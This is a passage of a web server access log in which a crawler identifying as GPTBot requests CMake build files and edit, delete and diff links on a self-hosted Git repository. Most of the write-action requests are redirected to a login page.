3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 1533] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15658] [Gzip 8.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9868] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:46:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9846] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:18:46:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11279] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11280] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11276] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" 